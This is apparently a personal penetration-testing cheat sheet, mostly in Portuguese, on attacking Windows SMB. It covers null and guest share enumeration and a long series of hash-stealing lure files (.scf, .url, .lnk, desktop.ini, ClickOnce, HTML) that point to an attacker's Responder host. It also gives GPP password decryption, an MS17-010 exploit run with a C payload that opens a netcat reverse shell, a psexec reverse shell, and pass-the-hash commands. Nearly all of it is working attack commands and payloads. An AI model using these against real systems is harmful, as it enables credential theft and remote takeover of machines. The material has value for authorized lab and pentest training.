SMB
OBS: Para que comporte todos as versões de protocolo, temos que informar o seguinte no arquivo de configuração:
[global]
#### Kali configuration (use kali-tweaks to change it) ####
# By default a Kali system should be configured for wide compatibility,
# to easily interact with servers using old vulnerable protocols.
#client min protocol = LANMAN1
client min protocol = CORE
client max protocol = SMB3
## Browsing/Identification ###
# force user = acosta
# Change this to the workgroup/NT-domain name your Samba server will part of
# workgroup = DOMAIN
Null session and guest
smbmap
null session
smbmap -H 10.11.1.227 -u '' -p ''
user guest
smbmap -H 10.11.1.227 -u guest -p ''
smbclient
smbclient -L 10.11.1.227 -U 'workgroup/guest'
<ENTER>
smbclient -U 'workgroup/guest' //10.11.1.227/share
<ENTER>
Para conseguir fazer enunmeração mais rapidamente, é interessante que utilizemos o recurso de recursividade no smbclient com os seguintes comandos:
recurse on
dir
Desta forma, basta exxecutar esses dois comandos para ele fazer a busca via dir recursivamente
Netexec
netexec smb <hostname> -u '' -p '' --shares
netexec smb <hostname> -u 'guest' -p '' --shares
Obter hashes de senhas
Aqui basicamente é obter hashes NTLMv2 para tentativa de quebrá-los com john ou hashcat.
Fonte: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
SCF files
[Shell]
Command=2
IconFile=\\10.10.14.4\smb\uwu.ico
[Taskbar]
Command=ToggleDesktop
sudo responder -I tun0
Internet Shortcuts (.url)
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
echo [InternetShortcut] > stealMyHashes.url
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
Forma um pouco mais criativa de fazer o ataque seria o seguinte. Informamos um ícone para facilitar a persuasão do usuário a clicar no link:
[InternetShortcut]
URL=https://securify.nl
IconIndex=0
IconFile=\\<responder ip>\leak\leak.ico
CLICKONCE
.NET's counterpart to Java Web Start is named ClickOnce. It works in a similar manner, applications are started via a ClickOnce deployment manifest file. These files can also contain UNC paths, similar to Java Web Start. Remarkably, ClickOnce deployment manifests are not blocked by Outlook.
Figure 4: ClickOnce deployment manifest files are not blocked in Outlook
<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<assemblyIdentity name="Leak.app" version="1.0.0.0" publicKeyToken="0000000000000000" language="neutral" processorArchitecture="x86" xmlns="urn:schemas-microsoft-com:asm.v1" />
<description asmv2:publisher="Leak" asmv2:product="Leak" asmv2:supportUrl="" xmlns="urn:schemas-microsoft-com:asm.v1" />
<deployment install="false" mapFileExtensions="true" trustURLParameters="true" />
<dependency>
<dependentAssembly dependencyType="install" codebase="file://<responder ip>/leak/Leak.exe.manifest" size="32909">
<assemblyIdentity name="Leak.exe" version="1.0.0.0" publicKeyToken="0000000000000000" language="neutral" processorArchitecture="x86" type="win32" />
<hash>
<dsig:Transforms>
<dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
</dsig:Transforms>
<dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />
<dsig:DigestValue>ESZ11736AFIJnp6lKpFYCgjw4dU=</dsig:DigestValue>
</hash>
</dependentAssembly>
</dependency>
</asmv1:assembly>
URL handlers
nomear de leak.html, por exemplo:
<!DOCTYPE html>
<html>
<script>
location.href = 'ms-word:ofe|u|\\<responder ip>\leak\leak.docx';
</script>
</html>
leak.htm, obtendo hashes pelo internet explorer ou edge
<!DOCTYPE html>
<html>
<img src="file://<responder ip>/leak/leak.png"/>
</html>
Java Web START
Nomear de leak.jnlp, por exemplo:
<?xml version="1.0" encoding="UTF-8"?>
<jnlp spec="1.0+" codebase="" href="">
<resources>
<jar href="file://<responder ip>/leak/leak.jar"/>
</resources>
<application-desc/>
</jnlp>
Figure 3: JNLP files are blocked in Outlook
Shortcut Files (.lnk)
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
[code language=”vb”]
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk"))
sc.TargetPath = "\\35.164.153.224\@OsandaMalith"
sc.WindowStyle = 1
sc.HotKey = "Ctrl+Alt+O"
sc.IconLocation = "%windir%\system32\shell32.dll, 3"
sc.Description = "I will Steal your Hashes"
sc.Save
[/code]
The Powershell version.
[code language=”powershell”]
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "I will Steal your Hashes"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
[/code]
Windows Script Files
Save this as something.wsf.
[code language=”xml”]
<package>
<job id="boom">
<script language="VBScript">
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
</script>
</job>
</package>
[/code]
Desktop.ini
The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes.
mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\192.168.0.1\aa >> desktop.ini
attrib +s +h desktop.ini
In Windows XP systems the desktop.ini file uses ‘IcondFile’ instead of ‘IconResource’.
[.ShellClassInfo]
IconFile=\\192.168.0.1\aa
IconIndex=1337
Autorun.inf
Starting from Windows 7 this feature is disabled. However you can enable by changing the group policy for Autorun. Make sure to hide the Autorun.inf file to work.
[autorun]
open=\\35.164.153.224\setup.exe
icon=something.ico
action=open Setup.exe
GPP Group.xml
Essa pasta geralmente se encontra dentro do diretório SYSVOL (compartilhado)
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
Nesse cenário, basta executarmos uma ferramenta para decriptar a senha armazenada neste arquivo:
git clone https://github.com/t0thkr1s/gpp-decrypt
python3 gpp-decrypt.py -f [groups.xml]
#ou
python3 gpp-decrypt.py -c [cpassword]
CVEs/Exploits
ms17-010
tools
cd cve/2017-0143/impacket
source exploit_ms17-010/bin/activate
Nesse momento já temos o ambiente preparado para execução do script, mas temos que preparar o paylolad pra funcionar:
#include<stdlib.h>
int main() {
int i;
i = system("START /B \\\\192.168.119.156\\smb\\nc.exe 192.168.119.156 80 -e cmd");
return 0;
}
Adequar este payload toda vez que for utilizá-lo
i686-w64-mingw32-gcc backup.c -o backup.exe
impacket-smbserver -smb2support smb /usr/share/windows-binaries
nc -nlvp 80
python ../impacket/send_and_execute.py 10.11.1.227 ../payload/backup.exe
Psexec
baixar do sysinternals
.\psexec -d -s -i ".\nc.exe -e powershell 10.10.14.14 8081"
Pass the hash
Impacket and evil-winrm
evil-winrm -i <hostname> -u user -H lmhash:nthash
impacket-psexec user@<hostname> -hashes lmhash:nthash
impacket-smbexec user@<hostname> -hashes lmhash:nthash
impacket-wmiexec user@<hostname> -hashes lmhash:nthash